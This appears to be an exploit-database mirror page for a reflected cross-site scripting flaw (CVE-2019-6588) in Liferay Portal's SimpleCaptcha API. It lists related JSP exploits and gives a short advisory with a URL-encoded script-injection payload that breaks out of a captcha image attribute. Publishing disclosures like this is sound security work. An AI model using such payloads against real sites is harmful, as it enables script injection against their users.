Menu

Improved exploit search engine. Try it out

"Liferay Portal 7.1 CE GA=3 / SimpleCaptcha API - Cross-Site Scripting"

Author

"Valerio Brussani"

Platform

jsp

Release date

2019-06-11

Release Date Title Type Platform Author
2019-06-11 "Liferay Portal 7.1 CE GA=3 / SimpleCaptcha API - Cross-Site Scripting" webapps jsp "Valerio Brussani"
2019-06-05 "Zimbra < 8.8.11 - XML External Entity Injection / Server-Side Request Forgery" webapps jsp k8gege
2019-05-10 "dotCMS 5.1.1 - HTML Injection" webapps jsp "Ismail Tasdelen"
2019-03-11 "OpenKM 6.3.2 < 6.3.7 - Remote Command Execution (Metasploit)" webapps jsp AkkuS
2019-02-19 "Zoho ManageEngine Netflow Analyzer Professional 7.0.0.2 - Path Traversal / Cross-Site Scripting" webapps jsp "Rafael Pedrero"
2019-02-18 "Zoho ManageEngine ServiceDesk Plus (SDP) < 10.0 build 10012 - Arbitrary File Upload" webapps jsp "Dao Duy Hung"
2018-10-30 "Microstrategy Web 7 - Cross-Site Scripting / Directory Traversal" webapps jsp "Rafael Pedrero"
2018-04-16 "Sophos Cyberoam UTM CR25iNG - 10.6.3 MR-5 - Direct Object Reference" webapps jsp Frogy
2018-02-22 "Trend Micro Email Encryption Gateway 5.5 (Build 1111.00) - Multiple Vulnerabilities" webapps jsp "Core Security"
2017-10-09 "Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - JSP Upload Bypass / Remote Code Execution (2)" webapps jsp intx0x80
2017-10-02 "OpenText Document Sciences xPression 4.5SP1 Patch 13 - 'documentId' SQL Injection" webapps jsp "Marcin Woloszyn"
2017-10-02 "OpenText Document Sciences xPression 4.5SP1 Patch 13 - 'jobRunId' SQL Injection" webapps jsp "Marcin Woloszyn"
2017-08-18 "Symantec Messaging Gateway 10.6.3-2 - Root Remote Command Execution" webapps jsp "Philip Pettersson"
2017-08-09 "DALIM SOFTWARE ES Core 5.0 build 7184.1 - Server-Side Request Forgery" webapps jsp LiquidWorm
2017-08-09 "DALIM SOFTWARE ES Core 5.0 build 7184.1 - Directory Traversal" webapps jsp LiquidWorm
2017-08-09 "DALIM SOFTWARE ES Core 5.0 build 7184.1 - Cross-Site Scripting / Cross-Site Request Forgery" webapps jsp LiquidWorm
2017-08-09 "DALIM SOFTWARE ES Core 5.0 build 7184.1 - User Enumeration" webapps jsp LiquidWorm
2017-08-01 "Advantech SUSIAccess < 3.0 - 'RecoveryMgmt' File Upload" webapps jsp "James Fitts"
2017-08-01 "Advantech SUSIAccess < 3.0 - Directory Traversal / Information Disclosure (Metasploit)" webapps jsp "James Fitts"
2017-07-19 "Oracle E-Business Suite 12.x - Server-Side Request Forgery" webapps jsp "Sarath Nair"
2017-04-25 "Oracle E-Business Suite 12.2.3 - 'IESFOOTPRINT' SQL Injection" webapps jsp ERPScan
2017-03-27 "Nuxeo 6.0/7.1/7.2/7.3 - Remote Code Execution (Metasploit)" webapps jsp Sysdream
2017-05-24 "NetGain EM 7.2.647 build 941 - Authentication Bypass / Local File Inclusion" webapps jsp f3ci
2018-01-05 "Gespage 7.4.8 - SQL Injection" webapps jsp Sysdream
2017-03-10 "Kinsey Infor/Lawson / ESBUS - SQL Injection" webapps jsp "Michael Benich"
2017-02-23 "NetGain Enterprise Manager 7.2.562 - 'Ping' Command Injection" webapps jsp MrChaZ
2017-01-04 "Atlassian Confluence < 5.10.6 - Persistent Cross-Site Scripting" webapps jsp "Jodson Santos"
2018-01-15 "Oracle E-Business Suite 12.1.3/12.2.x - Open Redirect" webapps jsp "Andrew Gill"
2016-08-31 "ZKTeco ZKAccess Security System 5.3.1 - Persistent Cross-Site Scripting" webapps jsp LiquidWorm
2016-08-31 "ZKTeco ZKBioSecurity 3.0 - 'visLogin.jsp' Local Authentication Bypass" webapps jsp LiquidWorm
Release Date Title Type Platform Author
2019-06-11 "Liferay Portal 7.1 CE GA=3 / SimpleCaptcha API - Cross-Site Scripting" webapps jsp "Valerio Brussani"
2019-01-15 "1Password < 7.0 - Denial of Service" dos android "Valerio Brussani"
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/46983/?format=json')
                                                {"url": "https://www.nmmapper.com/api/exploitdetails/46983/?format=json", "download_file": "https://www.nmmapper.com/st/exploitdetails/46983/41397/liferay-portal-71-ce-ga3-simplecaptcha-api-cross-site-scripting/download/", "exploit_id": "46983", "exploit_description": "\"Liferay Portal 7.1 CE GA=3 / SimpleCaptcha API - Cross-Site Scripting\"", "exploit_date": "2019-06-11", "exploit_author": "\"Valerio Brussani\"", "exploit_type": "webapps", "exploit_platform": "jsp", "exploit_port": null}
                                            

For full documentation follow the link above

Browse exploit DB API Browse

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
# Exploit Title: Liferay Portal < 7.1 CE GA4 / SimpleCaptcha API XSS
# Date: 04/06/2019
# Exploit Author: Valerio Brussani (@val_brux)
# Website: www.valbrux.it
# Vendor Homepage: https://www.liferay.com/
# Software Link: https://www.liferay.com/it/downloads-community
# Version: < 7.1 CE GA4
# Tested on: Liferay Portal 7.1 CE GA3
# CVE: CVE-2019-6588
# Reference1: https://dev.liferay.com/web/community-security-team/known-vulnerabilities/liferay-portal-71/-/asset_publisher/7v4O7y85hZMo/content/cst-7130-multiple-xss-vulnerabilities-in-7-1-ce-ga3
# Reference2: https://www.valbrux.it/blog/2019/06/04/cve-2019-6588-liferay-portal-7-1-ce-ga4-simplecaptcha-api-xss/


Introduction
In Liferay Portal before 7.1 CE GA4, an XSS vulnerability exists in the SimpleCaptcha API when custom code passes unsanitized input 
into the “url” parameter of the JSP taglib call <liferay-ui:captcha url=”<%= url %>” /> or <liferay-captcha:captcha url=”<%= url %>” />. 
A customized Liferay portlet which directly calls the Simple Captcha API without sanitizing the input could be susceptible to this vulnerability.
 
Poc
In a sample scenario of custom code calling the <liferay-ui:captcha url=”<%= url %>” /> JSP taglib, appending a payload like the following to the body parameters of a customized form:
 
&xxxx%22%3e%3cscript%3ealert(1)</script> 
 
The script is reflected in the src attribute of the <img> tag, responsible of fetching the next available captcha:
 
<img alt=”xxx” class=”xxxx” src=”xxxxxx“><script>alert(1)</script>=” />